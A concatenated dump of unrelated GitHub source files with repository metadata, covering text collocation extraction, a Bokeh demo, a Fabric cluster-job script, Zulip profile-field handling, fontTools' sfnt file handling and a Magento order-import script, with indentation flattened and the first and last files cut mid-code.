with open(_output_file_path_wordnet_not_collocations, 'w') as _output_file_wordnet_not_collocations:
for _n_gram in n_grams_not_collocations:
print(POS_tag_cleaner(_n_gram) + '\n', file = _output_file_wordnet_not_collocations)
if _verbose:
print("\n\tMethod-1: WordNet - N-grams that are not collocations are written to the file:\n\t%s" %(_output_file_path_wordnet_not_collocations), file = _output_file_verbose)
if _verbose:
print("\n--------------------------------------------------------------------------", file = _output_file_verbose)
print("\tMethod-1: WordNet - Collocation extraction - Complete", file = _output_file_verbose)
print("--------------------------------------------------------------------------\n\n", file = _output_file_verbose)
# Returning n-grams that are collocations and n-grams that are not
if _verbose:
print("\t\tCollocation extraction - Method-1 - successful")
return wordnet_collocations, n_grams_not_collocations
|
{
"content_hash": "a72f21ef6c16b67fa12b4b82d111a148",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 174,
"avg_line_length": 54.98924731182796,
"alnum_prop": 0.6576065701994525,
"repo_name": "shahryarabaki/ICE",
"id": "dc1e549c56bc117daf9afcc4cfc861cdef4f5893",
"size": "5114",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/collocations_method_1.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "427800"
}
],
"symlink_target": ""
}
|
import numpy as np
from bokeh.models import Button
from bokeh.palettes import RdYlBu3
from bokeh.plotting import figure, curdoc, vplot
# create a plot and style its properties
p = figure(x_range=(0, 100), y_range=(0, 100), toolbar_location=None)
p.border_fill_color = 'black'
p.background_fill_color = 'black'
p.outline_line_color = None
p.grid.grid_line_color = None
# add a text renderer to out plot (no data yet)
r = p.line(x=[], y=[], color="red")
i = 0
ds = r.data_source
# create a callback that will add a number in a random location
def callback():
global i
ds.data['x'].append(i)
ds.data['y'].append(np.random.random()*70 + 15)
ds.trigger('data', ds.data, ds.data)
i = i + 1
# add a button widget and configure with the call back
button = Button(label="Press Me")
button.on_click(callback)
# put the button and plot in a layout and add to the document
curdoc().add_root(vplot(button, p))
|
{
"content_hash": "42f59c6a6c9874dcea9c42544328abb9",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 69,
"avg_line_length": 27.176470588235293,
"alnum_prop": 0.698051948051948,
"repo_name": "ChinaBackGo/airmonitor",
"id": "dad4947f2f4409c099fd76007b14bd821f7fd8e6",
"size": "936",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh-scratch.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "1038"
}
],
"symlink_target": ""
}
|
import time
from fabric.api import env, run
from fabric.context_managers import cd
from fabric.operations import get
# Declare remote host
env.hosts = ['login.osgconnect.net']
# Declare remote username and key info (optional)
with open('C:/gh/data2/username.txt','r') as myfile:
env.user = myfile.read()
with open('C:/gh/data2/pw.txt','r') as myfile:
env.password = myfile.read()
# Commands to execute on the remote server
def run_demo():
run("git clone https://github.com/srcole/demo_OSG_python")
with cd('demo_OSG_python'):
run("chmod +x create_virtenv.sh")
run("./create_virtenv.sh")
run("rm -R python_virtenv_demo")
run("mv lfp_set/ /stash/user/"+env.user+"/lfp_set/")
run("tar -cvzf misshapen.tar.gz misshapen")
run("rm -R misshapen")
run("mkdir Log")
run("condor_submit sub_PsTs.submit")
# Need to wait until done running; should be less than 5 minutes
time.sleep(300)
get("./out*")
|
{
"content_hash": "a7d492a78d5aa8690282eab1016d8624",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 72,
"avg_line_length": 34.44827586206897,
"alnum_prop": 0.6436436436436437,
"repo_name": "srcole/qwm",
"id": "2ac91e7be75b99d2ca688d34e4db25f2814be2ed",
"size": "1066",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "demo_OSG_python/fabfile.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "194088"
},
{
"name": "HTML",
"bytes": "1160166"
},
{
"name": "JavaScript",
"bytes": "261184"
},
{
"name": "Jupyter Notebook",
"bytes": "52628978"
},
{
"name": "Python",
"bytes": "34827"
},
{
"name": "Shell",
"bytes": "81"
}
],
"symlink_target": ""
}
|
from typing import Dict, Iterable, List, Optional, Union
import orjson
from django.db import transaction
from django.utils.translation import gettext as _
from zerver.lib.exceptions import JsonableError
from zerver.lib.external_accounts import DEFAULT_EXTERNAL_ACCOUNTS
from zerver.lib.streams import render_stream_description
from zerver.lib.types import ProfileDataElementUpdateDict, ProfileFieldData
from zerver.models import (
CustomProfileField,
CustomProfileFieldValue,
Realm,
UserProfile,
active_user_ids,
custom_profile_fields_for_realm,
)
from zerver.tornado.django_api import send_event
def notify_realm_custom_profile_fields(realm: Realm) -> None:
fields = custom_profile_fields_for_realm(realm.id)
event = dict(type="custom_profile_fields", fields=[f.as_dict() for f in fields])
send_event(realm, event, active_user_ids(realm.id))
def try_add_realm_default_custom_profile_field(
realm: Realm,
field_subtype: str,
display_in_profile_summary: bool = False,
) -> CustomProfileField:
field_data = DEFAULT_EXTERNAL_ACCOUNTS[field_subtype]
custom_profile_field = CustomProfileField(
realm=realm,
name=str(field_data.name),
field_type=CustomProfileField.EXTERNAL_ACCOUNT,
hint=field_data.hint,
field_data=orjson.dumps(dict(subtype=field_subtype)).decode(),
display_in_profile_summary=display_in_profile_summary,
)
custom_profile_field.save()
custom_profile_field.order = custom_profile_field.id
custom_profile_field.save(update_fields=["order"])
notify_realm_custom_profile_fields(realm)
return custom_profile_field
def try_add_realm_custom_profile_field(
realm: Realm,
name: str,
field_type: int,
hint: str = "",
field_data: Optional[ProfileFieldData] = None,
display_in_profile_summary: bool = False,
) -> CustomProfileField:
custom_profile_field = CustomProfileField(
realm=realm,
name=name,
field_type=field_type,
display_in_profile_summary=display_in_profile_summary,
)
custom_profile_field.hint = hint
if (
custom_profile_field.field_type == CustomProfileField.SELECT
or custom_profile_field.field_type == CustomProfileField.EXTERNAL_ACCOUNT
):
custom_profile_field.field_data = orjson.dumps(field_data or {}).decode()
custom_profile_field.save()
custom_profile_field.order = custom_profile_field.id
custom_profile_field.save(update_fields=["order"])
notify_realm_custom_profile_fields(realm)
return custom_profile_field
def do_remove_realm_custom_profile_field(realm: Realm, field: CustomProfileField) -> None:
"""
Deleting a field will also delete the user profile data
associated with it in CustomProfileFieldValue model.
"""
field.delete()
notify_realm_custom_profile_fields(realm)
def do_remove_realm_custom_profile_fields(realm: Realm) -> None:
CustomProfileField.objects.filter(realm=realm).delete()
def remove_custom_profile_field_value_if_required(
field: CustomProfileField, field_data: ProfileFieldData
) -> None:
old_values = set(orjson.loads(field.field_data).keys())
new_values = set(field_data.keys())
removed_values = old_values - new_values
if removed_values:
CustomProfileFieldValue.objects.filter(field=field, value__in=removed_values).delete()
def try_update_realm_custom_profile_field(
realm: Realm,
field: CustomProfileField,
name: str,
hint: str = "",
field_data: Optional[ProfileFieldData] = None,
display_in_profile_summary: bool = False,
) -> None:
field.name = name
field.hint = hint
field.display_in_profile_summary = display_in_profile_summary
if (
field.field_type == CustomProfileField.SELECT
or field.field_type == CustomProfileField.EXTERNAL_ACCOUNT
):
if field.field_type == CustomProfileField.SELECT:
assert field_data is not None
remove_custom_profile_field_value_if_required(field, field_data)
field.field_data = orjson.dumps(field_data or {}).decode()
field.save()
notify_realm_custom_profile_fields(realm)
def try_reorder_realm_custom_profile_fields(realm: Realm, order: Iterable[int]) -> None:
order_mapping = {_[1]: _[0] for _ in enumerate(order)}
custom_profile_fields = CustomProfileField.objects.filter(realm=realm)
for custom_profile_field in custom_profile_fields:
if custom_profile_field.id not in order_mapping:
raise JsonableError(_("Invalid order mapping."))
for custom_profile_field in custom_profile_fields:
custom_profile_field.order = order_mapping[custom_profile_field.id]
custom_profile_field.save(update_fields=["order"])
notify_realm_custom_profile_fields(realm)
def notify_user_update_custom_profile_data(
user_profile: UserProfile, field: Dict[str, Union[int, str, List[int], None]]
) -> None:
data = dict(id=field["id"], value=field["value"])
if field["rendered_value"]:
data["rendered_value"] = field["rendered_value"]
payload = dict(user_id=user_profile.id, custom_profile_field=data)
event = dict(type="realm_user", op="update", person=payload)
send_event(user_profile.realm, event, active_user_ids(user_profile.realm.id))
def do_update_user_custom_profile_data_if_changed(
user_profile: UserProfile,
data: List[ProfileDataElementUpdateDict],
) -> None:
with transaction.atomic():
for custom_profile_field in data:
field_value, created = CustomProfileFieldValue.objects.get_or_create(
user_profile=user_profile, field_id=custom_profile_field["id"]
)
# field_value.value is a TextField() so we need to have field["value"]
# in string form to correctly make comparisons and assignments.
if isinstance(custom_profile_field["value"], str):
custom_profile_field_value_string = custom_profile_field["value"]
else:
custom_profile_field_value_string = orjson.dumps(
custom_profile_field["value"]
).decode()
if not created and field_value.value == custom_profile_field_value_string:
# If the field value isn't actually being changed to a different one,
# we have nothing to do here for this field.
continue
field_value.value = custom_profile_field_value_string
if field_value.field.is_renderable():
field_value.rendered_value = render_stream_description(
custom_profile_field_value_string
)
field_value.save(update_fields=["value", "rendered_value"])
else:
field_value.save(update_fields=["value"])
notify_user_update_custom_profile_data(
user_profile,
{
"id": field_value.field_id,
"value": field_value.value,
"rendered_value": field_value.rendered_value,
"type": field_value.field.field_type,
},
)
def check_remove_custom_profile_field_value(user_profile: UserProfile, field_id: int) -> None:
try:
custom_profile_field = CustomProfileField.objects.get(realm=user_profile.realm, id=field_id)
field_value = CustomProfileFieldValue.objects.get(
field=custom_profile_field, user_profile=user_profile
)
field_value.delete()
notify_user_update_custom_profile_data(
user_profile,
{
"id": field_id,
"value": None,
"rendered_value": None,
"type": custom_profile_field.field_type,
},
)
except CustomProfileField.DoesNotExist:
raise JsonableError(_("Field id {id} not found.").format(id=field_id))
except CustomProfileFieldValue.DoesNotExist:
pass
|
{
"content_hash": "b6c3b7f551006f706d6d5cefd2e5effd",
"timestamp": "",
"source": "github",
"line_count": 210,
"max_line_length": 100,
"avg_line_length": 38.24285714285714,
"alnum_prop": 0.6604407919312664,
"repo_name": "andersk/zulip",
"id": "7fb0ad31cf0b3bc31ca74324288aae3c9aecc5fd",
"size": "8031",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "zerver/actions/custom_profile_fields.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "490256"
},
{
"name": "Dockerfile",
"bytes": "4025"
},
{
"name": "Emacs Lisp",
"bytes": "157"
},
{
"name": "HTML",
"bytes": "749848"
},
{
"name": "Handlebars",
"bytes": "377098"
},
{
"name": "JavaScript",
"bytes": "4006373"
},
{
"name": "Perl",
"bytes": "10163"
},
{
"name": "Puppet",
"bytes": "112128"
},
{
"name": "Python",
"bytes": "10168530"
},
{
"name": "Ruby",
"bytes": "3459"
},
{
"name": "Shell",
"bytes": "146797"
},
{
"name": "TypeScript",
"bytes": "284837"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import os
import sys
import tempfile
import time
sys.path.insert(1, os.path.join("..","..",".."))
from h2o.automl import H2OAutoML
from tests import pyunit_utils as pu
from _automl_utils import import_dataset
def automl_mojo():
ds = import_dataset()
aml = H2OAutoML(max_models=2, project_name="py_lb_test_aml1", seed=1234)
aml.train(y=ds.target, training_frame=ds.train)
# download mojo
model_zip_path = os.path.join(tempfile.mkdtemp(), 'model.zip')
time0 = time.time()
print("\nDownloading MOJO @... " + model_zip_path)
mojo_file = aml.download_mojo(model_zip_path)
print(" => %s (%d bytes)" % (mojo_file, os.stat(mojo_file).st_size))
assert os.path.exists(mojo_file)
print(" Time taken = %.3fs" % (time.time() - time0))
assert os.path.isfile(model_zip_path)
os.remove(model_zip_path)
pu.run_tests([
automl_mojo
])
|
{
"content_hash": "91b58cfc7e88073a5b1e0ae8700a29d1",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 76,
"avg_line_length": 28.03030303030303,
"alnum_prop": 0.6572972972972972,
"repo_name": "h2oai/h2o-3",
"id": "d7b6b2032e5fd5cf1bb957ce19c2be2ccf17fe17",
"size": "925",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "h2o-py/tests/testdir_algos/automl/pyunit_automl_mojo.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "12803"
},
{
"name": "CSS",
"bytes": "882321"
},
{
"name": "CoffeeScript",
"bytes": "7550"
},
{
"name": "DIGITAL Command Language",
"bytes": "106"
},
{
"name": "Dockerfile",
"bytes": "10459"
},
{
"name": "Emacs Lisp",
"bytes": "2226"
},
{
"name": "Groovy",
"bytes": "205646"
},
{
"name": "HCL",
"bytes": "36232"
},
{
"name": "HTML",
"bytes": "8018117"
},
{
"name": "HiveQL",
"bytes": "3985"
},
{
"name": "Java",
"bytes": "15981357"
},
{
"name": "JavaScript",
"bytes": "148426"
},
{
"name": "Jupyter Notebook",
"bytes": "20638329"
},
{
"name": "Makefile",
"bytes": "46043"
},
{
"name": "PHP",
"bytes": "800"
},
{
"name": "Python",
"bytes": "8188608"
},
{
"name": "R",
"bytes": "4149977"
},
{
"name": "Ruby",
"bytes": "64"
},
{
"name": "Sass",
"bytes": "23790"
},
{
"name": "Scala",
"bytes": "4845"
},
{
"name": "Shell",
"bytes": "214495"
},
{
"name": "Smarty",
"bytes": "1792"
},
{
"name": "TeX",
"bytes": "554940"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.core.urlresolvers import reverse
from cosinnus.views.profile import UserProfileUpdateView
from cosinnus.views.user import UserListView
class BusListView(UserListView):
template_name = 'ecobasa/bus_list.html'
def get_context_data(self, **kwargs):
context = super(BusListView, self).get_context_data(**kwargs)
context['user_list'] = context['user_list'].filter(cosinnus_profile__has_bus=True)
return context
bus_list = BusListView.as_view()
class BusAddView(UserProfileUpdateView):
template_name = 'ecobasa/bus_add.html'
def get_success_url(self):
return reverse('bus-list')
bus_add = BusAddView.as_view()
|
{
"content_hash": "4144c5b5425dbf080dab62f43fc7e36a",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 90,
"avg_line_length": 27.46153846153846,
"alnum_prop": 0.7240896358543417,
"repo_name": "ecobasa/ecobasa",
"id": "5a6b1297e87c1372acd4e30df566771a7b492793",
"size": "738",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ecobasa/views/bus.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "10161"
},
{
"name": "Dockerfile",
"bytes": "799"
},
{
"name": "HTML",
"bytes": "363806"
},
{
"name": "JavaScript",
"bytes": "24440"
},
{
"name": "Less",
"bytes": "1595"
},
{
"name": "Python",
"bytes": "877232"
},
{
"name": "SCSS",
"bytes": "42435"
}
],
"symlink_target": ""
}
|
import os
import re
import json
import argparse
from os.path import join, isdir
from sys import argv, exit
from urllib2 import HTTPError
from goslate import Goslate
from settings import USE_SSL, GOOGLE_DOMAINS
service_urls = [('https://' if USE_SSL else 'http://') + 'translate' + domain for domain in GOOGLE_DOMAINS]
gs = Goslate(service_urls=service_urls)
def wrap(string):
pattern_start = re.compile('{{')
pattern_end = re.compile('}}')
string = pattern_start.sub('<span>{{', string)
string = pattern_end.sub('}}</span>', string)
return string
def unwrap(string):
pattern_start = re.compile('<span> {{', re.IGNORECASE)
pattern_end = re.compile('}} </span>', re.IGNORECASE)
string = string.replace('</ ', '</')
string = pattern_start.sub('{{', string)
string = pattern_end.sub('}}', string)
return string
def translate(string, source, target):
try:
return gs.translate(string, target, source).encode('utf-8')
except HTTPError, err:
if err.code == 404:
exit('Bad Google Translate Domain: {0}'.format(err.url))
raise err
def translate_all(strings):
for string in strings:
if type(strings[string]) == type(dict()):
translate_all(strings[string])
else:
original_string = wrap(strings[string])
translated_string = unwrap(translate(original_string, source_language, target_language))
original_variables = re.findall('{{.*}}', original_string)
translated_variables = re.findall('{{.*}}', translated_string)
if len(original_variables) > 0:
for i, var in enumerate(original_variables):
translated_string = translated_string.replace(translated_variables[i], str(var))
strings[string] = translated_string
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', help='input help')
parser.add_argument('-o', '--output', help='output help')
parser.add_argument('source_language', type=str)
parser.add_argument('target_language', type=str)
args = parser.parse_args();
input_dir = args.input if args.input is not None else 'i18n'
output_dir = args.output if args.output is not None else 'i18n'
source_language = args.source_language.lower()
target_language = args.target_language.lower()
supported = [x.lower() for x in gs.get_languages().keys()]
if source_language not in supported:
exit('{0} not supported.'.format(source_language))
if target_language not in supported:
exit('{0} not supported.'.format(target_language))
source_dir = join(input_dir, source_language)
target_dir = join(output_dir, target_language)
for root, dirs, files in os.walk(source_dir):
for filename in files:
filepath = join(root, filename)
outpath = join(target_dir, filename)
if not isdir(target_dir):
os.mkdir(target_dir)
with open(filepath, 'r') as f:
strings = json.load(f, 'utf-8')
translate_all(strings)
with open(outpath, 'w+') as f:
json.dump(strings, f, indent=4, separators=(',', ': '), ensure_ascii=False)
|
{
"content_hash": "9a269b1649ecf38fa964781f44421372",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 107,
"avg_line_length": 32.27450980392157,
"alnum_prop": 0.6215066828675577,
"repo_name": "maxdeviant/linguist",
"id": "81a82f951a33b0f356ba7210014074c45b84b4b7",
"size": "3292",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "linguist.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7285"
}
],
"symlink_target": ""
}
|
"""ttLib/sfnt.py -- low-level module to deal with the sfnt file format.
Defines two public classes:
SFNTReader
SFNTWriter
(Normally you don't have to use these classes explicitly; they are
used automatically by ttLib.TTFont.)
The reading and writing of sfnt files is separated in two distinct
classes, since whenever to number of tables changes or whenever
a table's length chages you need to rewrite the whole file anyway.
"""
import sys
import struct, sstruct
import numpy
import os
class SFNTReader:
def __init__(self, file, checkChecksums=1, fontNumber=-1):
self.file = file
self.checkChecksums = checkChecksums
data = self.file.read(sfntDirectorySize)
if len(data) <> sfntDirectorySize:
from fontTools import ttLib
raise ttLib.TTLibError, "Not a TrueType or OpenType font (not enough data)"
sstruct.unpack(sfntDirectoryFormat, data, self)
if self.sfntVersion == "ttcf":
assert ttcHeaderSize == sfntDirectorySize
sstruct.unpack(ttcHeaderFormat, data, self)
assert self.Version == 0x00010000 or self.Version == 0x00020000, "unrecognized TTC version 0x%08x" % self.Version
if not 0 <= fontNumber < self.numFonts:
from fontTools import ttLib
raise ttLib.TTLibError, "specify a font number between 0 and %d (inclusive)" % (self.numFonts - 1)
offsetTable = struct.unpack(">%dL" % self.numFonts, self.file.read(self.numFonts * 4))
if self.Version == 0x00020000:
pass # ignoring version 2.0 signatures
self.file.seek(offsetTable[fontNumber])
data = self.file.read(sfntDirectorySize)
sstruct.unpack(sfntDirectoryFormat, data, self)
if self.sfntVersion not in ("\000\001\000\000", "OTTO", "true"):
from fontTools import ttLib
raise ttLib.TTLibError, "Not a TrueType or OpenType font (bad sfntVersion)"
self.tables = {}
for i in range(self.numTables):
entry = SFNTDirectoryEntry()
entry.fromFile(self.file)
if entry.length > 0:
self.tables[entry.tag] = entry
else:
# Ignore zero-length tables. This doesn't seem to be documented,
# yet it's apparently how the Windows TT rasterizer behaves.
# Besides, at least one font has been sighted which actually
# *has* a zero-length table.
pass
def has_key(self, tag):
return self.tables.has_key(tag)
def keys(self):
return self.tables.keys()
def __getitem__(self, tag):
"""Fetch the raw table data."""
entry = self.tables[tag]
self.file.seek(entry.offset)
data = self.file.read(entry.length)
if self.checkChecksums:
if tag == 'head':
# Beh: we have to special-case the 'head' table.
checksum = calcChecksum(data[:8] + '\0\0\0\0' + data[12:])
else:
checksum = calcChecksum(data)
if self.checkChecksums > 1:
# Be obnoxious, and barf when it's wrong
assert checksum == entry.checksum, "bad checksum for '%s' table" % tag
elif checksum <> entry.checkSum:
# Be friendly, and just print a warning.
print "bad checksum for '%s' table" % tag
return data
def __delitem__(self, tag):
del self.tables[tag]
def close(self):
self.file.close()
class SFNTWriter:
def __init__(self, file, numTables, sfntVersion="\000\001\000\000"):
self.file = file
self.numTables = numTables
self.sfntVersion = sfntVersion
self.searchRange, self.entrySelector, self.rangeShift = getSearchRange(numTables)
self.nextTableOffset = sfntDirectorySize + numTables * sfntDirectoryEntrySize
# clear out directory area
self.file.seek(self.nextTableOffset)
# make sure we're actually where we want to be. (XXX old cStringIO bug)
self.file.write('\0' * (self.nextTableOffset - self.file.tell()))
self.tables = {}
def __setitem__(self, tag, data):
"""Write raw table data to disk."""
if self.tables.has_key(tag):
# We've written this table to file before. If the length
# of the data is still the same, we allow overwriting it.
entry = self.tables[tag]
if len(data) <> entry.length:
from fontTools import ttLib
raise ttLib.TTLibError, "cannot rewrite '%s' table: length does not match directory entry" % tag
else:
entry = SFNTDirectoryEntry()
entry.tag = tag
entry.offset = self.nextTableOffset
entry.length = len(data)
self.nextTableOffset = self.nextTableOffset + ((len(data) + 3) & ~3)
self.file.seek(entry.offset)
self.file.write(data)
# Add NUL bytes to pad the table data to a 4-byte boundary.
# Don't depend on f.seek() as we need to add the padding even if no
# subsequent write follows (seek is lazy), ie. after the final table
# in the font.
self.file.write('\0' * (self.nextTableOffset - self.file.tell()))
assert self.nextTableOffset == self.file.tell()
if tag == 'head':
entry.checkSum = calcChecksum(data[:8] + '\0\0\0\0' + data[12:])
else:
entry.checkSum = calcChecksum(data)
self.tables[tag] = entry
def close(self):
"""All tables must have been written to disk. Now write the
directory.
"""
tables = self.tables.items()
tables.sort()
if len(tables) <> self.numTables:
from fontTools import ttLib
raise ttLib.TTLibError, "wrong number of tables; expected %d, found %d" % (self.numTables, len(tables))
directory = sstruct.pack(sfntDirectoryFormat, self)
self.file.seek(sfntDirectorySize)
seenHead = 0
for tag, entry in tables:
if tag == "head":
seenHead = 1
directory = directory + entry.toString()
if seenHead:
self.calcMasterChecksum(directory)
self.file.seek(0)
self.file.write(directory)
def calcMasterChecksum(self, directory):
# calculate checkSumAdjustment
tags = self.tables.keys()
checksums = numpy.zeros(len(tags)+1, numpy.uint32)
for i in range(len(tags)):
checksums[i] = self.tables[tags[i]].checkSum
directory_end = sfntDirectorySize + len(self.tables) * sfntDirectoryEntrySize
assert directory_end == len(directory)
checksums[-1] = calcChecksum(directory)
checksum = numpy.add.reduce(checksums,dtype=numpy.uint32)
# BiboAfba!
checksumadjustment = int(numpy.subtract.reduce(numpy.array([0xB1B0AFBA, checksum], numpy.uint32)))
# write the checksum to the file
self.file.seek(self.tables['head'].offset + 8)
self.file.write(struct.pack(">L", checksumadjustment))
# -- sfnt directory helpers and cruft
ttcHeaderFormat = """
> # big endian
TTCTag: 4s # "ttcf"
Version: L # 0x00010000 or 0x00020000
numFonts: L # number of fonts
# OffsetTable[numFonts]: L # array with offsets from beginning of file
# ulDsigTag: L # version 2.0 only
# ulDsigLength: L # version 2.0 only
# ulDsigOffset: L # version 2.0 only
"""
ttcHeaderSize = sstruct.calcsize(ttcHeaderFormat)
sfntDirectoryFormat = """
> # big endian
sfntVersion: 4s
numTables: H # number of tables
searchRange: H # (max2 <= numTables)*16
entrySelector: H # log2(max2 <= numTables)
rangeShift: H # numTables*16-searchRange
"""
sfntDirectorySize = sstruct.calcsize(sfntDirectoryFormat)
sfntDirectoryEntryFormat = """
> # big endian
tag: 4s
checkSum: L
offset: L
length: L
"""
sfntDirectoryEntrySize = sstruct.calcsize(sfntDirectoryEntryFormat)
class SFNTDirectoryEntry:
def fromFile(self, file):
sstruct.unpack(sfntDirectoryEntryFormat,
file.read(sfntDirectoryEntrySize), self)
def fromString(self, str):
sstruct.unpack(sfntDirectoryEntryFormat, str, self)
def toString(self):
return sstruct.pack(sfntDirectoryEntryFormat, self)
def __repr__(self):
if hasattr(self, "tag"):
return "<SFNTDirectoryEntry '%s' at %x>" % (self.tag, id(self))
else:
return "<SFNTDirectoryEntry at %x>" % id(self)
def calcChecksum(data, start=0):
"""Calculate the checksum for an arbitrary block of data.
Optionally takes a 'start' argument, which allows you to
calculate a checksum in chunks by feeding it a previous
result.
If the data length is not a multiple of four, it assumes
it is to be padded with null byte.
"""
from fontTools import ttLib
remainder = len(data) % 4
if remainder:
data = data + '\0' * (4-remainder)
data = struct.unpack(">%dL"%(len(data)/4), data)
a = numpy.array((start,)+data, numpy.uint32)
return int(numpy.sum(a,dtype=numpy.uint32))
def maxPowerOfTwo(x):
"""Return the highest exponent of two, so that
(2 ** exponent) <= x
"""
exponent = 0
while x:
x = x >> 1
exponent = exponent + 1
return max(exponent - 1, 0)
def getSearchRange(n):
"""Calculate searchRange, entrySelector, rangeShift for the
sfnt directory. 'n' is the number of tables.
"""
# This stuff needs to be stored in the file, because?
import math
exponent = maxPowerOfTwo(n)
searchRange = (2 ** exponent) * 16
entrySelector = exponent
rangeShift = n * 16 - searchRange
return searchRange, entrySelector, rangeShift
|
{
"content_hash": "01af67ad14d9e4da6056064ffd20f89a",
"timestamp": "",
"source": "github",
"line_count": 273,
"max_line_length": 116,
"avg_line_length": 32.26007326007326,
"alnum_prop": 0.693539230157829,
"repo_name": "shadowmint/nwidget",
"id": "6019d5fad561370f7541a01e7769102bd218649d",
"size": "8807",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/fonttools-2.3/Lib/fontTools/ttLib/sfnt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "11298"
},
{
"name": "JavaScript",
"bytes": "17394"
},
{
"name": "PHP",
"bytes": "2190"
},
{
"name": "Python",
"bytes": "9815941"
},
{
"name": "Shell",
"bytes": "10521"
}
],
"symlink_target": ""
}
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "2e4bb297f3cf59c5c2eeb645a6ff43ba",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 64,
"avg_line_length": 27.375,
"alnum_prop": 0.7077625570776256,
"repo_name": "stephrdev/brigitte",
"id": "448a7a7ac3b402010447eff4b06fc0456f49f5c9",
"size": "241",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "brigitte_site/manage.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "10097"
},
{
"name": "Python",
"bytes": "162658"
}
],
"symlink_target": ""
}
|
import MySQLdb
import logging
import datetime
from settings import db_password, db_name, MdbUser, MdbPassword, Mdb, MdbIP
from functions import getPhoneID, getFaxID, getAddressID
logging.basicConfig(filename='logs/detector.log', level=logging.DEBUG)
# logger = logging.getLogger(__name__)
def check_new_orders(lastOid):
"""New recent orders check up """
checkUp = False
db = MySQLdb.connect(host=MdbIP, user=MdbUser, passwd=MdbPassword, db=Mdb)
MySQL_c = db.cursor()
MySQL_c.execute(
"""SELECT entity_id FROM sales_flat_order ORDER BY created_at DESC
LIMIT 1""")
lastMid = int(MySQL_c.fetchone()[0])
db.commit()
db.close()
if lastMid > lastOid:
checkUp = True
return checkUp
def getLastOid():
"""Retrieve last detected order id out from OrSys"""
db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
MySQL_c = db.cursor()
MySQL_c.execute(
"""SELECT magento_id FROM orders ORDER BY magento_time DESC LIMIT 1""")
lastOid = int(MySQL_c.fetchone()[0])
db.commit()
db.close()
return lastOid
def getFreshOrderDataSet(o_id):
"""Retrieve data about order and products inside it"""
logging.basicConfig(filename='logs/detector.log', level=logging.DEBUG)
#
db = MySQLdb.connect(host=MdbIP, user=MdbUser, passwd=MdbPassword, db=Mdb)
MySQL_c = db.cursor()
MySQL_c.execute(
"""SELECT customer_firstname, customer_lastname, customer_email,
shipping_address_id, billing_address_id, created_at
FROM sales_flat_order WHERE entity_id=%s""", (o_id,))
(customer_firstname, customer_lastname, customer_email,
shipping_address_id, billing_address_id, mag_time) = MySQL_c.fetchone()
#
sh_address = getAddress(shipping_address_id)
b_address = getAddress(billing_address_id)
try:
cName = customer_firstname + ' ' + customer_lastname
except TypeError:
cName = 'corrupted'
logging.debug('This is corrupted custorer name in %s', o_id)
o_Data = {
'cName': cName,
'cEmail': customer_email, 'shAddress': sh_address,
'bAddress': b_address, 'magTime': mag_time, 'mID': o_id
}
MySQL_c.execute(
"""SELECT sku, qty_ordered, price, name FROM sales_flat_order_item
WHERE order_id=%s""", (o_id))
productsDataSet = MySQL_c.fetchall()
db.commit()
db.close()
return o_Data, productsDataSet
def getAddress(aID):
"""Retrieve address attributes from remote Magento DB"""
db = MySQLdb.connect(host=MdbIP, user=MdbUser, passwd=MdbPassword, db=Mdb)
MySQL_c = db.cursor()
aA = {}
MySQL_c.execute(
"""SELECT region, postcode, firstname, lastname, street, city, email,
telephone, fax FROM sales_flat_order_address WHERE entity_id=%s""",
(aID,))
(region, postcode, firstname, lastname, street, city, email, telephone,
fax) = MySQL_c.fetchone()
db.commit()
db.close()
(aA['region'], aA['postcode'], aA['firstname'], aA['lastname'],
aA['street'], aA['city'], aA['email'], aA['telephone'], aA['fax']) = (
region, postcode, firstname, lastname, street, city, email,
telephone, fax)
return aA
def insertOrder(o_Data):
"""Accordingly with the definition :-)"""
db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
MySQL_c = db.cursor()
rTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
shippingAddress = o_Data['shAddress']
(province, ZIP,
firstname, lastname,
street, city,
email, telephone,
fax) = (
shippingAddress['region'], shippingAddress['postcode'],
shippingAddress['firstname'], shippingAddress['lastname'],
shippingAddress['street'], shippingAddress['city'],
shippingAddress['email'], shippingAddress['telephone'],
shippingAddress['fax']
)
country = 'Australia' # it is a tap
shAid = getAddressID(street, city, province, ZIP, country, 1)
shPhid = getPhoneID(telephone, 1)
c_id = getCustomerID(firstname, lastname, email, shPhid, shAid)
